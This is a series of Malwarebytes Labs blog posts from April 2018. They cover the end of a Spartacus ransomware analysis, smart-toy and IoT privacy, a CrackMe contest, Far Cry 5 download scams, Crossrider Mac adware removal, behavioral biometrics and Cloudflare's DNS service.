After all of this, the final thing it does is call smethod_0, which deletes shadow volumes in order to prevent the user from using as a Windows restore point.

This ransomware is purely offline in that there are no network communications back to the author or any C2 server. The ransomware author does not know who he has infected until they email him with their personal ID, which is the AES key. This also means that the decryption tool the author will send is likely embedded with the AES key, which unfortunately will be unique to the specific victim.

There is nothing special or innovative about this sample, but that does not mean it is not dangerous. It will still do its job—at the moment there is no decryptor for this. The only slight possibility to save yourself if you realize you are being hit with this malware is to perform a process memory dump, in which case there is a slight possibility of extracting the keys from memory.

In general, it is always a good idea to perform a memory dump of any malware on your system before killing the process in the slight chance that some keys can be recovered.

The post Spartacus ransomware: introduction to a strain of unsophisticated malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 23 – April 29)

Malwarebytes - Mon, 04/30/2018 - 15:17

Last week, we dug into behavioral biometrics, explored a new crossrider variant, and embraced the power of “no.” We also launched another CrackMe challenge, took a deep dive into smart toys, and finished up with a look at digital privacy in the age of IoT.

Other news

Stay safe, everyone!

The post A week in security (April 23 – April 29) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Please don’t buy this: smart toys

Malwarebytes - Fri, 04/27/2018 - 16:00

Smart toys attempt to offer what a lot of us imagined as kids—a toy that we can not only play with, but one that plays back. Many models offer voice recognition, facial expressions, hundreds of words and phrases, reaction to touch and impact, and even the ability to learn and retain new information. These features provide an obvious thrill for many children, whose imaginary friend just became a lot more real.

At the low end, smart toys can be as simple as a motion-activated rattle designed with features intended to help with developmental milestones. Higher-end toys can be as engaging as a real-life R2-D2 that will watch Star Wars with you and offer commentary.

But much like other Internet of Things products, smart toys don’t have a great track record of protecting personal information, designing software according to industry best practices, and updating in a timely manner. And we’re in fairly new territory when it comes to young children and the Internet. Suddenly, we have to worry about protecting the digital footprint of our kids before they’re even online as active participants. Not only that, we don’t yet know the repercussions of a person’s data being collected and transmitted online essentially from birth.

As cool as that R2-D2 is, we suggest for the time being that you please don’t buy smart toys.

Why not?

The problems start to creep in with the data collection necessary for a toy to be properly interactive. While simple games and preprogrammed phrases can launch using on board memory or a bluetooth connection to a computer, more complex speech recognition and “remembering” user preferences and conversations generally requires sending input data to a remote server for analysis of the training data set.

This process can be completely benign if all points in the data transmission chain are configured and secured properly. Unfortunately, there is a lot of room in the collection chain for vulnerabilities to creep in.

At the point of collection, decisions need to be made to appropriately sanitize personal information. (Doubly important if the user is a child.) The collected data needs to be transmitted in a manner that’s secure against third-party eavesdroppers. And at the other end of the collection chain, all data needs to be stored on a secure server using patched, up-to-date software, and hashed with a modern, secure algorithm. Smart toy makers have not done well on any of these benchmarks in the past.

Setting privacy issues aside for a moment, software update lag is a common issue with any IoT device. A smart toy may be smart today, but new functionality and bug fixes might be rare or nonexistent to allow for new product releases. Security patches, in particular, vary wildly in frequency across IoT manufacturers. Of the manufacturers we reviewed, only Fisher Price disclosed anything specific about their updates and data collection practices, and no manufacturers provided any information about security features.

Lastly, security design of these products—in particular, their associated mobile apps—is generally not very good. Hong Kong maker VTech Electronics made the news in 2015 for what they described as a “sophisticated” SQL injection attack that resulted in exposure of personal information for millions of children. Breaches happen quite a bit, and the temptation is to dismiss it as something unavoidable. But an outstanding article by Troy Hunt took a look at their security practices and found:

  • No usage of SSL anywhere on their websites
  • Password hashing with a deprecated, easily-cracked algorithm
  • Storage of security questions in plain text
  • Extensive use of Flash

For those not in the know, these are basic, 101-level security design flaws that in total suggest irresponsibility by the company rather than a one-off event by a hyper-competent hacker. (Please read Troy’s followup article, which goes into greater detail on the impact of VTech’s poor design.)

Until companies can be held to a unified standard of foundational security practices, allowing them access to an underaged user in any way is ill-advised.

Maybe buy this instead

Beyond the security issues built into the product out of the box, adult users aren’t always helping the cause, ignoring updates or clicking through agreements without reading privacy notices in detail. Often simple computer hygiene, like changing the default password, could save a family from creepy hacks of their baby monitors and teddy bears.

Sitting down with your toddler and having a conversation about privacy and secure PII best practices probably won’t go well, either. Should your child not be amenable to an IoT ban, Fisher Price makes a series of smart toys that state clearly that no personal information is transmitted via WiFi. Clear, unequivocal statements like that are rare in the IoT space.

However, in 2016, a Fisher Price smart bear was found to be leaking customer and children’s data via an unsecured API. Industry security standards for most IoT products are so low that even the best in a particular class can still be a risk.

For the sake of the children

Smart toys take all of the risk of IoT products and apply them to children. Prior negligence by some companies, as well as the larger impact of security flaws when the user is a child, prompted the FBI to release an advisory on potential issues with smart toys. Until manufacturers operate under a shared security standard with meaningful enforcement, we advise that please, for the sake of the kids—don’t buy this.

The post Please don’t buy this: smart toys appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes CrackMe 2: try another challenge

Malwarebytes - Fri, 04/27/2018 - 15:00

Last November, we released the first edition of the Malwarebytes CrackMe. Encouraged by the positive response we received from the security community, we decided to repeat the game, hopefully making it even more interesting and entertaining.

As before, the CrackMe is dedicated to malware analysts and to those who want to practice becoming them. That’s why it is not just a set of some abstract riddles, but an exercise that walks through selected tricks that were used in real malware. (Expect some original schemes designed just for this game, too.)

Of course, all is demonstrated on harmless examples, but we still recommend you use VM for reversing it so that it will not interfere with any antivirus protection.

Rules of the contest

There are two CrackMe contests:

  1. Capture the flag. The first three submitted flags win. The flag should be submitted along with (minimalistic) notes about the steps taken to find it. (No detailed write-up is required.)
  2. Best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show his/her method of solving the CrackMe, as well as their level of understanding of the techniques used. The write-up submission contest closes three weeks after capture the flag.

Submissions to both contests should be sent to my Twitter account: @hasherezade. Each of the four winners will get a prize: a book of his/her choice and some Malwarebytes swag.

At the end of the contest, I will publish my own solution, made from the point of view of author. All the submitted write-ups will be linked.

UPDATE: We already have the winners in the “Capture the flag” category: 1) Hexacorn 2) florek_pl 3) FraMauronz. Congratulations! Now we are waiting for your write-ups!

Asking questions

I want the contest to be fair to everyone, so I will not be answering any questions in private. However, if you are stuck, please don’t hesitate to post your question in the comments section of this post, and I will answer as soon as possible. The questions can be also answered by other participants. Giving false clues or teasing beginners will result in a ban—please respect fair play.

The application

The application is a Windows executable. It was tested on Windows 7 and above.

You can download it here.

Have fun!

The post Malwarebytes CrackMe 2: try another challenge appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The Internet of Everything and digital privacy: what you need to know

Malwarebytes - Thu, 04/26/2018 - 15:36

If you don’t already own Internet of Things (IoT) devices, you likely will soon. IoT-enabled devices are physical gadgets with built-in Internet connectivity that allow data transmission; often this happens in the background with no indication to the user that anything is happening.

The IoT is more like the Internet of Everything—statistics indicate within the next couple of years, there will be three IoT devices for every adult and child on the planet.

So, should people be concerned about consumer privacy and data security if these gadgets are always on and ready to transmit information whether we realize it or not? Let’s take a look.

Rise of the IoT brings new security concerns

The functionality and capabilities of IoT devices bring about realities that haven’t been dealt with before. Many people know they can opt out of some data collection techniques used on websites. However, if they do that with most IoT devices, the decision typically impacts how the gadgets work and may render them useless.

There’s also the fact that the increase in connected devices causes a gigantic jump in the amount of data collected. Individuals understandably wonder which device manufacturers know details about them, where the data gets stored, and how those companies use the data.

As the number of IoT devices goes up, the infiltration points for potential hackers rises, too. There was a time when cybercriminals mostly targeted only the primary corporate data stores, but there have also been instances of hackers breaking into IoT devices themselves.

It’s essential for IoT companies to take all-encompassing data protection measures, including releasing security patches for known vulnerabilities.

Read: Internet of Things (IoT) security: what is and what should never be

Both consumers and companies must prepare

There are positive and negative factors associated with the Internet of Everything.

For example, companies can collect more data, which could make them prime targets for breaches. But, they can theoretically use that data to personalize user experiences, making them more relevant.

So what can companies do to both optimize their technology and protect user data? For one, they can be proactive about on-site cybersecurity strategies and data usage disclosures. By encrypting IoT device data while it’s at rest or in transit, businesses can take a substantial step toward improving user security. It’s also worthwhile for them to consult IoT security specialists to perform site audits or check for device vulnerabilities.

The European Union’s soon-to-be-enacted GDPR regulations do not provide clear-cut guidance for IoT devices in particular, but they emphasize obtaining user consent. Because it’s difficult to foresee all instances in which permission might be required, some recommendations suggest getting user consent during the setup process for an IoT device.

Consumers also need to strive for research regarding how to take steps that protect their devices and their data as much as possible. For example, limiting the permissions of an IoT device or periodically deleting the data Google and Amazon store about you is a good start. Signing up for the email list associated with an IoT device brand could also keep you in the loop about any known security flaws, letting you proactively download a patch as soon as it becomes available.

Researching privacy settings put in place by a specific IoT device is another smart step to take. For example, Fitbit offers detailed information on its website about privacy, data sharing, and how to tweak the respective settings on your Fitbit profile.

Third-party monitoring is essential

The recent news of Cambridge Analytica and its improper handling of Facebook user data highlighted the erosion of digital privacy taking place today, especially among third-party platforms. Most people knew Facebook had details about them but didn’t think about the potential of that information getting into the hands of a different company.

In the case of the Cambridge Analytica breach, people did not even have to download the app that grabbed their information. It was enough for a user in a person’s network to interact with the offending app, thereby triggering it to get data from all associated friends.

Facebook admitted it did not properly enforce rules set for how third-party companies handled the site’s data, so monitoring was seemingly non-existent.

Google also came under fire for a similar problem related to data mismanaged by third-party companies. Then, the issues stemmed from Android apps that tracked kids’ information.

It’s also crucial to think about what a lack of third-party monitoring could mean for people who use their IoT devices for payments. It’s already possible to buy a pizza or book a taxi with an Amazon smart speaker, and PayPal launched functionality in 2016 that allows for making payments instantly from any IoT device.

A survey about payment convenience polling more than 2,500 people found nearly two-thirds of them would pay through IoT devices to make transactions faster and easier. But, by doing so, would they be trading privacy for convenience?

Researching device-specific privacy information is often difficult enough. When third-party payment processors come into the picture, it’s harder still for people to get concrete answers about what happens to their data.

Government regulation

In the aftermath of theses incidents, questions have arisen about whether it’s time for governmental regulation to come into play.

However, a poll shows only 41 percent of Americans believe Facebook would follow regulatory rules if they were set. Based on that result, putting regulations in place wouldn’t do much to boost consumer confidence, but it may have other benefits.

Research shows IoT bottlenecks often occur when data gets analyzed, aggregated, and communicated. Regulation could minimize those slowdowns and associated problems. Experts point out that besides regulatory rules indicating what companies cannot do, they should set good examples. For example, if the government provides sufficient bandwidth and opens up more of the electromagnetic spectrum for speedy, wireless information transfers, communication slowdowns will become less prominent.

Experts point out that besides regulatory rules indicating what companies cannot do, they should set good examples of how to reduce risks to people who use IoT devices.

Lawmakers in the US have teamed up to put that ideal into action. They created a proposed framework that imposes minimum standards for IoT devices: For instance, they cannot have hard-coded passwords. If they contain known vulnerabilities, they must provide written explanations detailing why the gadgets are secure, despite those shortcomings.

Even if the proposed regulations do not become part of national law, the information within them steers IoT manufacturers in other countries in the right direction. They might not have previously considered some of the stipulations presented in the guidelines, but could potentially change their approaches to designing and securing IoT devices after reading them.

Awareness reduces consumer risk

Being aware of digital privacy begins when initially setting up IoT devices. Many consumers blindly click “I Agree” to any prompts they see, but need to read agreements and understand what they mean before proceeding. It’s necessary for you to take that approach when updating apps, too.

Also, when downloading an app, you’ll probably see a dialogue box indicating which information the app pulls from your device. In some cases, you can limit the information received or shared.

Unfortunately, app permissions descriptions are often too brief and unclear. If you feel uneasy about likely approving a reduction in your digital privacy by agreeing to vague permissions, consider not downloading the app.

Keeping your devices updated is a smart first step because it gives you the latest security patches. Going further and being proactive by limiting shared data reduces the information hackers can potentially get.

Although it’s necessary for companies to keep user data privacy in mind, consumers cannot assume there is no need for them to take further action.

When you use IoT-enabled devices, it’s crucial to realize how a feature that seems convenient at first may sacrifice privacy, making it warrant scrutiny.

Kayla Matthews is a tech journalist covering AI, the IoT, smart gadgets and cybersecurity. In addition to being a senior writer for MakeUseOf, Kayla is a regular contributor at Digital Trends, The Next Web, VentureBeat and TechnoBuffalo. Read more from Kayla at

The post The Internet of Everything and digital privacy: what you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Far Cry 5 download offers: embrace the power of “no”

Malwarebytes - Wed, 04/25/2018 - 16:18

The recently released Far Cry 5 is a video game where you reclaim Montana from a cult obsessed with the “power of yes” by hitting members over the head with a shovel. It’s also one of the biggest sellers for publisher Ubisoft to date, and it stands to reason that many people would like to grab a copy for free.

It’s been a while since we saw a wave of YouTube vids promising free games all based around one title, but this is definitely one of those moments given the huge popularity of its shovel-throwing hero.

In the past week or so, we’ve seen videos galore, all offering downloads or sign ups or sign ups and downloads (novel!), with a couple of heart-warming flashbacks to our somewhat off-the-boil friend, the survey scam (and a couple of download sites, too). The standard operating procedure for these kinds of scams means they’re reliant on here today, gone tomorrow videos so the view count typically varies between half a dozen and thousands upon thousands. Not all of them get taken down, so it’s possible to drive huge numbers to the final destination.

Here’s a typical example:

Click to enlarge

Nothing says old school like “poorly typing out instructions in Notepad while giving you a tour of my desktop.” That one leads to a site called oceanofgames(dot)com, which itself offers up a variety of download links:

Clicking the blue button takes you to solvettube(dot)com, which serves up a similar number of links/adverts, and offers up a roughly 40GB download after hitting the page. The download kept failing for us so we can’t tell you what it is, but caveat emptor (with the additional caveat in your caveat by pointing out you’re not actually buying anything here).

Next up, we have someone filming their TV screen for what looks like a promo for a console version. The site being promoted here is fc5(dot)gamereach(dot)net, and we’ll come back to that one later.

Click to enlarge

The next video is pretty ugly looking, and features hideous gigantic text over a web browser. Having said that, people likely to fall for these things probably couldn’t care less what the video looks like.

Click to enlarge

The other videos knocking around all follow the same pattern; crudely thrown together video, lots of text to ensure it gets picked up in searches, and the suggestion that you should get over there quick before the offer expires.

First, we’ll check out fr5(dot)yourunlocker(dot)org, which is your standard survey unlocker website.

Click to enlarge

Select your platform, hit the verify button, and:

Lots of surveys to choose from. Here’s one site we ended up on—a sign up for something to do with “unlimited movies.”

Click to enlarge

One of the other websites is a lot slicker and involves a fair bit of hoop jumping to get anywhere (and by “anywhere” I mean “a survey page”). It’s the one located at fc5(dot)gamereach(dot)net that we mentioned earlier.

It’s presented as some sort of pretend post-crowdfunding campaign page by someone claiming to be a team of game developers. The implication is, I guess, that they worked on Far Cry 5. It’s a bit of an odd line to take because it certainly wasn’t crowdfunded.

Click to enlarge

Thanks to you we were able to reach our goals! And with this little project we’ll lessen the strain on your wallets! One free game at a time! Dev. Andrey

From the FAQ page:

How are you able to give out a great game like this for free?

…if you followed our crowdfunding campaign, you should know that we got way past our set goal, and with the additional support and money, we were able to create a game which far exceeded our expectations, and we even have money left to spare, and with those, we decided to release this small project as an additional token of appreciation to all our supporters

Apparently, a game with a development budget of between $80 to $130 million dollars is a “small project” these days.

This one is all about submitting your email address and an “access code.” They claim you had to have contributed to their indie campaign to get your hands on one, but it doesn’t matter—the code is posted underneath the “console promo” YouTube video near the start of this blog.

Click to enlarge

Enter your access code

Enter your email

Select your platform

Then they perform some checks. No, really:

Click to enlarge

After this, there’s messages about them needing to confirm you’re a human and not a bot (flimsy justification for popping survey questions the world over), followed by survey-style options leading to mobile-centric offers.

Click to enlarge

Click to enlarge

The other sites currently floating around act in much the same way; time-sensitive offer, not a bot verification, and lots of offers, downloads, and surveys to wade through before a total lack of free video game action. There’s no end to them. Here’s a screenshot filtered to just the last few hours of uploads:

Click to enlarge

Claims of DRM free downloads, or dubious cracks, are also rife. More often than not, downloading a supposedly unofficial copy of the game will just lead to headaches, especially where dabbling with game cracks is concerned. Malware is probably going to pay you a visit at some point, and then you’ll definitely need something more technical than a throwable shovel to solve the problem.

As much as you may wish to take down the evil cult plaguing Montana,the more sensible course of action is to wait until a game sale pops up.

Forget the power of yes; it’s time to embrace the power of no, and steer clear of download offers.

The post Far Cry 5 download offers: embrace the power of “no” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Crossrider variant installs configuration profiles on Macs

Malwarebytes - Tue, 04/24/2018 - 16:30

A new variant of the Crossrider adware has been spotted that is infecting Macs in a unique way. For the most part, this variant is still quite ordinary, doing some of the same old things that we’ve been seeing for years in Mac adware. However, the use of a configuration profile introduces a unique new method for maintaining persistence.

Persistence is the goal of most malware. After all, what good is it to infect a machine if the malware stops running as soon as the computer restarts? There are some cases where that can still be useful (ransomware, for example), but in most cases, that’s not desired behavior. So malware creators are often stuck using the same old methods of persistence that are easy to spot. Sometimes, though, they get creative.

Infection method

This new Crossrider variant doesn’t look like much on the surface. It’s yet another fake Adobe Flash Player installer, looking like the thousands of others we’ve seen over the years.

Opening the installer results in a familiar install process, with nothing unique about it. In the course of installation, it dumps a copy of Advanced Mac Cleaner, which commences to announce that it has found problems with your system using Siri’s voice. (No such problems actually exist, of course.) Safari also pops open and then closes again suspiciously. This is all very blasé, as far as malware goes.

But something interesting has happened behind the scenes. After removing Advanced Mac Cleaner, and removing all the various components of Crossrider that have been littered around the system, there’s still a problem. Safari’s homepage setting is still locked to a Crossrider-related domain, and cannot be changed.

Malicious configuration profile

It turns out that this is caused by a configuration profile installed on the system by the adware. Configuration profiles provide a means for IT admins in businesses to control the behavior of their Macs. These profiles can configure a Mac to do many different things, some of which are not otherwise possible.

In the case of this Crossrider variant, the configuration profile that is installed forces both Safari and Chrome to always open to a page on chumsearch[dot]com. This also prevents the user from changing that behavior in the browser’s settings.

The profile can be found by opening System Preferences, then clicking the Profiles icon. (If there isn’t a Profiles icon, you don’t have any profiles installed, which is normal.)

This profile installs with an identifier of com.myshopcoupon.www, which is not visible in System Preferences. However, the profile can definitely be identified by scrolling through the details and looking for references to chumsearch[dot]com. This malicious profile can be removed by selecting it and clicking the minus (-) button in the bottom left corner of the window.

If you’re an IT admin

For those readers who are managing fleets of Macs and need to check for and/or remove these profiles remotely, that’s pretty easy using a few simple shell scripts.

On macOS 10.12 and earlier, you can use a command like this:

sudo profiles -L

This works on macOS 10.13 as well, but there is an updated syntax that would be best to use in the future:

sudo profiles list

Either way, if you see an unfamiliar profile, particularly one with a profileIdentifier of com.myshopcoupon.www, that profile should be removed. This can be done with the following command on macOS 10.12 and earlier:

sudo profiles -R -p com.myshopcoupon.www

Or, for macOS 10.13:

sudo profiles remove -identifier com.myshopcoupon.www Gone in a Flash

The good news is that there was nothing particularly sneaky about the method of infection. Fake Adobe Flash Player installers are nothing new, and are easy to avoid. Still, people do continue to fall for such scams.

If you see a message in your web browser telling you that Adobe Flash Player needs to be updated, it’s almost certainly a scam. Do not follow any of the directions provided by these messages, and especially don’t download and install whatever they tell you to.

If you do have Flash installed on your Mac, and you believe that it needs an update, you can check for and install updates from the Update tab in the Flash Player pane in System Preferences.

If you want to install Flash for the first time on your Mac, the first thing you should do is think twice. Flash is a dying technology, and is a constant source of security vulnerabilities. Few sites these days truly require Flash. However, if you really do insist on installing it, you should download it only from Adobe’s website.

The post New Crossrider variant installs configuration profiles on Macs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Securing financial data of the future: behavioral biometrics explained

Malwarebytes - Tue, 04/24/2018 - 15:00

Some of us would be pretty excited about a brave, new passwordless world. Gone would be the days of having to write down 27 passwords and post them beside monitor screens. Or having to yell them out loud to a colleague on the other side of the room.

For banks and other financial institutions, a world without passwords may not be the end-all-be-all scenario they exactly had in mind. They have realized that passwords, even with the aid of two-factor authentication, don’t do enough to protect sensitive client information from today’s digital threats.

Since then, they have been on the lookout for innovative ways to efficiently secure customer accounts. It didn’t take long for them to start considering biometrics—the measurement and analysis of a person’s unique characteristics.

While a range of banks have already adopted some biometric modalities, recently more and more financial institutions are beginning to take notice of behavioral biometrics due to its:

  • Flexibility. It can be tailored to an organization’s specific needs.
  • Convenience. It requires no specialized hardware, and doesn’t negatively impact user experience.
  • Efficiency. It functions in real-time and can be used alongside other modes of authentication.
  • Security. It’s inherently difficult to replicate or steal.

Let’s get to know this promising biometric modality even more, shall we?

What is behavioral biometrics?

Also known as behaviometrics or behavior-based authentication, this is a dynamic form of authentication that looks into a person’s behavioral patterns—the way they interact with systems and technologies—to identify users.

In the financial sector, this is used to continuously ensure that the person in a transaction with an online bank, an eCommerce site, a payment app, or a multi-factor authentication service is who they claim to be from the time they log in to the time they log out.

In using this mode, one doesn’t need more passwords to memorize or download and save a set of backup codes that they can retrieve should something goes wrong with their password. As behavioral biometrics is generally passive, meaning one will not realize that it is there, users can do their financial transactions continuously and securely without having to take additional action.

Outside the financial sector, behavioral biometrics can be applied to any piece of modern computer technology capable of interacting with systems that allow the user to do tasks without interruption and protect potentially sensitive data in real time. Here is a scenario on how this will look like in practice:

Sarah sends $25 to her flatmate, Cindy, via a popular P2P payment app as contribution to this weekend’s grocery run. They have planned on having a 90’s horror movie marathon, and she invited her cousin, Robin, to tag along. While Sarah and Cindy are preparing meals in the kitchen, Robin is left in the living room to pick out the films.

Robin saw Sarah left her phone on the couch, unlocked. After sneaking a look at the kitchen entryway, she grabbed the phone and loaded up her cousin’s P2P app, intending to send money to her own account because her mom didn’t have much in her wallet when she checked it this morning. Robin has planned a night out with friends tomorrow, and if Sarah realizes the transfer, she’s confident that her cousin would understand.

After Robin confirms the money transfer on the app, a message pops up on the screen saying she isn’t authorized to do that. And this is because the biometric software installed in the payment app has recognized the mismatch of Robin’s behavioral pattern against Sarah’s unique profile.

Shut the front door! Can it really be that accurate?

Terrifically and terrifyingly so, which is great for consumers and financial institutions. The scenario above is hypothetical and may not be as convincing, so here’s a real one: From 2012–2013, a European bank implemented a behavioral biometric scheme to their online banking service. Behavior data were collected from a limited number of clients per session for several months.

A session began when a customer logged in to the online banking portal and ended when the customer logged out. The transactions they completed while logged in could range from using a one-time password to regular banking transactions like checking accounts or transferring money.

As behavioral biometrics worked behind the scenes, clients went about their business generally with little to no disruption from the biometric scheme. After the trial run, they assessed the accuracy of the data and determined that the clients during those sessions were recognized as the correct users 99.7% of the time.

This means that if User A logs into an online bank with a behavioral biometric implementation, the system can validate that, based on their behavior patterns, the user logged in is still User A from beginning to end of a session.

And a 99.7% accuracy is said to be significantly high compared to that of other biometric modalities.

This almost sounds too good to be true. How does it work?

The key to the accuracy of behavioral biometrics is machine learning, or computer systems having the ability to automatically learn for themselves and improve data without being explicitly programmed. A user’s behavioral patterns, such as the way one holds their smartphones, moves their mouse, or swipes their finger on a tablet screen, are measured and recorded using sensors (or the accelerometer and gyroscope if we’re talking about other devices like smartphones).

Advanced software algorithms then analyze all collected data to create a profile for the user. This profile is then used to continuously check against a user who is in an online banking session, as we have seen in the above case study. And that user could either be the true user, an imposter, or a bot.

The true user will almost always match their profile, while it would be impossible for an imposter to mimic their victim’s behavior. Bots generally fail to demonstrate measurable human responses, and don’t respond at all to additional random passive behavioral tests injected within a session. That said, a system can spot bots the easiest.

As of this writing, behavioral biometrics is used for continuous authentication, risk-based authentication, insider threat detection, and fraud detection and prevention.

Wait. Isn’t it a privacy violation when a product starts collecting users’ patterns of behavior?

When it comes to biometrics, privacy is a huge concern, and this particular modality isn’t immune to them.

Unlike traditional forms of biometrics that gather and store physiological characteristics of a person, such as their fingerprint or iris scan, behavioral biometrics collect user data that cannot be associated with a particular individual. A person’s fingerprint can identify them, but how they move their mouse pointer or hold their smartphone cannot. Behavioral biometrics also doesn’t need to know who you are, where you live, what bank your savings are at, or what your account credentials are for it to be sure that you are the same user who logged on last time.

According to the International Biometrics + Identity Associate (IBIA), the kind of data collected by behavioral biometric applications is the data already being received by device or network operators under standard privacy laws. But as behavior data can be classed as non-personally identifiable information, the FTC, state governments, and the US Congress are considering regulating and restricting their collection and sharing.

This is mainly due to the practice of behavior monitoring and targeting for the purposing of online advertising, not for the purpose of authentication or as an added security layer. The Electronic Frontier Foundation (EFF) published a legislative primer about concerns and solutions for this kind of behavior monitoring that you can read here.

What providers of this modality can do is to educate their users about the security benefits of behavior-based authentication, to be transparent about how the data being collected is used, and give users the option to revoke the usage license of their biometric data. IBIA has already asserted that behavioral biometrics providers are looking for novel approaches to addressing privacy concerns.

Are there any disadvantages to behavioral biometrics?

Regardless of how unreal behavioral biometrics may sound, the fact is this modality—like the others—isn’t perfect. Voice or speaker recognition, signature analysis, and keystroke dynamics are methods of behavioral biometrics, and they each have weaknesses. Sometimes, they even pose additional security risks.

For example, voice authentication can be circumvented by obtaining a high-quality recording of the target’s voice to be played back in the future. Background noise is also an issue when it comes to registering one’s voice for authentication. Keystroke analysis and signature recognition have low accuracy rates and can readily be affected by the user’s physical and emotional disposition, respectively.

Note that the behavioral biometric scheme employed by current providers for financial systems do not use the above forms of modalities. As of this writing, there is no literature on the disadvantages of AI-driven behavioral biometrics.

What happens if a user changes the way they interact with their device?

We mentioned earlier that behavioral biometrics is a dynamic form of authentication. By this we mean that it doesn’t only accept and remember one biometric entry, such as a fingerprint. Instead, it receives and recognizes the number of ways users perform an action and other notable characteristics. All these (and possibly more) are analyzed and used to create a profile for a single user.

Changes in a person’s behavior naturally happen, even when a person doesn’t realize it, and this has been accounted for when measuring behavior. Let’s also not forget that behavioral biometrics coupled with machine learning continuously check for the identity of a user in a session. The slight difference in behavior won’t lock out someone from their account.

What other threats do behavioral biometrics claims to address?

In the financial sector, behavioral biometrics can provide protection against account-sharing fraud, account takeover attacks, new account fraud, malware, and some RATs. One provider even claims it can help protect against ransomware.

Behavioral biometrics can also be used to nip incidences of insider threats in the bud.

Not yet ready to replace passwords

Behavioral biometrics in the financial sector is relatively new and continues to improve and mature. At this point in time, it doesn’t claim to replace passwords or two-factor authentication. It is, however, another supplement to the bigger picture: a layered security approach to protecting sensitive user data. So as much as we’d like to reach that ultimate dream of an utterly passwordless society—and this is entirely possible in our lifetime—we may have to wait a little bit longer. After all, the groundwork is prepped, and we’re seeing organizations beginning to build on it.

Behavior-based authentication can potentially change a lot of things, and we can expect a new trend emerging in user verification soon. And with it comes possibly new and interesting challenges for the cybersecurity industry to tackle.

The post Securing financial data of the future: behavioral biometrics explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 16 – April 22)

Malwarebytes - Mon, 04/23/2018 - 16:06

Last week, we took a stroll down memory lane talking about Facebook and MySpace, noticed a change in the Magnitude exploit kit—wherein it started adopting the GandCrab ransomware, took a good look at a new form of adware that is based on Python, chatted a bit about Russian hacking with a journalist, encouraged retailers to ask the right questions to protect their business, and weighed in on a way to speed up Internet bandwidth and increase privacy via Cloudflare’s new DNS service.

Other news
  • Cryptocurrency is all the rave these days—and so are cryptominers. Security researchers recently discovered one that doesn’t rely on an open browser session. (Source: HackRead)
  • Tax fraud is no longer for the clueless, it seems. Experts noticed that scammers are also targeting tax professionals—those filing taxes on behalf of their clients. (Source: CNBC)
  • To date, adware, spyware, and malware have lurked inside the Google Play Store. But surveillanceware? That’s definitely something new. (Source: Lookout Blog)
  • At the recently concluded RSA conference, tech companies like Microsoft and Facebook joined together to sign a pledge to protect users and refrain from helping any government launch a cyberattack. (Source: ZDNet)
  • While the usage of Adobe Flash has significantly decreased, this doesn’t mean that the threats exploiting them have declined. So remain vigilant! (Source: McAfee’s Securing Tomorrow Blog)
  • Gmail’s new “Confidential Mode” is not entirely private after all. SIGH. (Source: Sophos’s Naked Security Blog)
  • Security researchers noticed an increased activity of APT groups based in Asia and the Middle East. (Source: SC Magazine)
  • Here’s a new word to keep in mind: trustjacking. And iPhone users are particularly at risk of this one. (Source: Wired)
  • Stresspaint, a new information stealer, is a type of malware that is after Chrome login data, session cookies, and appears to be particularly interested in Facebook details. (Source: Bleeping Computer)
  • A ransomware variant appeared to be repurposed to infect files, mine for cryptocurrency…and destroy affected users’ files. Good grief! (Source: ZDNet)

Stay safe, everyone!

The post A week in security (April 16 – April 22) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cloudflare’s new DNS service

Malwarebytes - Fri, 04/20/2018 - 16:00

Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.

What is DNS?

DNS is short for Domain Name System. It is an internet protocol that allows user systems to use domain names/URLs to identify a web server rather than inputting the actual IP address of the server.  For example, the IP address for is, but rather than typing that into your browser, you just type ‘,’ and your system reaches out to a ‘DNS Server’ which has a list of all domain names and their corresponding IP address, delivering that upon request to the user system.  Unfortunately, if a popular DNS server is taken down or in some way disrupted, many users are unable to reach their favorite websites because, without the IP address of the web server, your system cannot find the site. When trying to explain the concept of DNS name resolution, I think that finding a phone number for a certain person is a good analogy. There are several ways to find a person’s phone number and the same is true for resolving an IP address that belongs to a domain name.

Which DNS servers am I using now?

If you have to ask yourself that question, there’s a big chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those that have looked into changing their DNS servers have probably ended up using Google’s public DNS, or if they were also interested in a web filter, they might have ended up using Cisco’s OpenDNS. IMHO those are the two most popular alternatives for the ones provided by ISPs around the globe, but many more are available.

Why would I change to Cloudflare’s?

We are not saying you should, but their claims sound very promising. Even if the differences in speed and privacy are not directly noticeable, you may be convinced by these arguments:

  • Cloudflare’s service is 5 times faster than the average ISP’s (8 milliseconds compared to 70).
  • ISPs do not always use strong encryption on their DNS or support DNSSEC, which makes their DNS queries vulnerable to data breaches and exposes users to threats like man-in-the-middle attacks.
  • Many companies collect data from their DNS customers to use for commercial purposes. Cloudflare promises not to mine any user data. Logs are kept for 24 hours for debugging purposes, then they are purged.
  • Query name minimization diminishes privacy leakage by only sending minimal query names to authoritative DNS servers.

That last one may need some explanation. The less information the DNS servers send to each other to resolve your DNS query, the smaller is the amount of data that would be revealed in case of a leak or breach. This is why servers that use this method only send each other the minimum of information that the receiving server needs.

How to change your DNS servers?

The method to change your DNS servers depends very much on the level at which you want to change them and on the operating system you are using. If you have tried the DNS service and decide that you like it, it might be advisable to change the DNS servers at the router level, so you don’t have to do it for each device separately. To do this successfully your computers and devices need to be set up for DHCP, or they will not even look at the router for DNS information. Lifewire published a guide for the most common routers that might prove to be handy. For mobile devices be aware that they will change DNS servers when they are no longer using your router.

At the device level, the OS is the deciding factor on how you can change the DNS servers.

Testing the difference

To check whether it would be a possible speed improvement for you to switch DNS service you can use a free toll called NameBench.

Background information: the NameBench tool is offered by Google and was launched around the same time that Google started offering their free DNS service.

NameBench can be downloaded from Google Code – there are suitable versions for several operating systems –  and after installation, you can specify the DNS servers that you would like it to test.

  • Google Public DNS:
  • Cloudflare DNS:
  • OpenDNS :

